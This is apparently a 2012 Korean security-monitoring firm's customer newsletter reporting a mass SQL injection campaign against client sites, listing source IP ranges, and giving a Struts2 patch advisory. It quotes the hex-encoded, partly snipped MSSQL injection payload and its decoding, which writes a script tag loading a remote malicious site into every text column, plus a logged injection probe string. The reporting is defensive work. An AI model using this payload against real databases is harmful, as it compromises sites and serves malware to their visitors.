안녕하세요
Quarry Systems 윤동한입니다.
오늘은 긴급하게 2가지 보안 소식만 전해드리겠습니다.
1. 관제시스템 보안로그 분석결과
저희 회사 관제시스템에 연동된 보안시스템의
이벤트 분석 중 특이한 패턴이 있어 메일 드립니다.
지난달 6월5일부터 15일까지 10일간
아래 IP대역에서 Mass SQL Injection이 저희 고객사의 20%이상 해당하는
10여 곳의 사이트에 동시다발적으로 진행되었습니다.
한 국가에서 특정 웹 해킹 공격을 불특정 다수의 웹 사이트에
특정 기간 동안만 공격한 사례는 처음이라 조금 흥미로운 로그로 생각됩니다
공격을 한 곳은 모두 미국 쪽 IP였습니다.
64.120.194.X/24 미국
66.96.223.X/24 미국
64.120.220.X/24 미국
173.212.225.X/24 미국
173.212.235.X/24 미국
173.212.227.X/24 미국
184.82.12.X/24 미국
공격은 다음 과 같은 형식으로 진행되었습니다.
공격구문
657420616e73695f7761726e696e6773206f6666204445434c415245204054205641524348415228323535292c4
0320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f5220736
56c65637420632e---------snip----------9746c653e3c7363726970742727202729204645544348204e4558542046524f4d
205461626c655f437572736f722049444f2040542c404320454e4420434c4f5345205461626c655f437572736f7220444
5414c4c4f43415445205461626c655f437572736f72+as+varchar%284000%29%29+exec%28%40s%29
공격구문 디코딩결과
ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('------SNIP-------
IN EXEC('UPDATE ['+@T+'] SET ['+@C+']=''"></title><script src="XXXX://lilupophilupop.com/sl.php"></script><!--''+RTRIM(CONVERT(VARCHAR(6000),['+@C+'])) where LEFT(RTRIM(CONVERT(VARCHAR(6000),['+@C+'])),17)<>''"></title><script'' ') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor+................
WAF로그 및 서버 로그
PAGEID=189%27%29%29%2F%2A%2A%2For%2F%2A%2A%2F1%3D%40%40version
해당 공격은 IIS, MSSQL, ASP에 영향을 주는 공격으로
작년 12월부터 발생을 하고 있습니다.
Reference는 아래와 같습니다.
Ref: http://isc.sans.edu/diary.html?storyid=12127
2. 2012.7월 웹 보안권고(Critical)
권고사항: Java Struts2 Framework 보안 업데이트 권고
취약점 내용: Java Web framework인 ‘Apache struts2’에 코드실행 취약점 발견
공격자는 취약점을 이용해 우회 공격가능
해당 취약점을 이용하는 중국 툴이 나왔고, 공격 증가추세
Reference
[1] http://struts.apache.org/download.cgi
[2] http://websec.wordpress.com/tag/apache-struts2/
[3] https://www.sec-consult.com/en/advisories.html#a76
작년 12월 해당 PoC가 나오고 올해 1월 Patch가 나왔지만, 최근
해당 취약점을 이용한 중국 툴이 발견되면서 보안 관제회사에서
관련 보안 경고를 하고 있는 상태입니다.
'고객사 뉴스레터' 카테고리의 다른 글
| [2012년 8월]보안 관제뉴스/ 벤더별 신규업데이트 / Oracle CPU 업데이스 소식 (0) | 2012.08.09 |
|---|---|
| [2012년 7월]보안뉴스, CISCO News Letter, Fortinet, Symatec Tech Tip (0) | 2012.07.27 |
| [2012년 6월]6월 보안관제현황/ 보안해킹 기술 외 (0) | 2012.07.27 |
| [2012년 6월]시만텍 SEP취약점 update권고,iPhone VPN on Fortigate, 관제서비스 변경내용 (0) | 2012.07.27 |
| [2012년 5월 CISCO UCS/NX Guide, Piolink L4 Trouble Shooting guide (0) | 2012.07.27 |
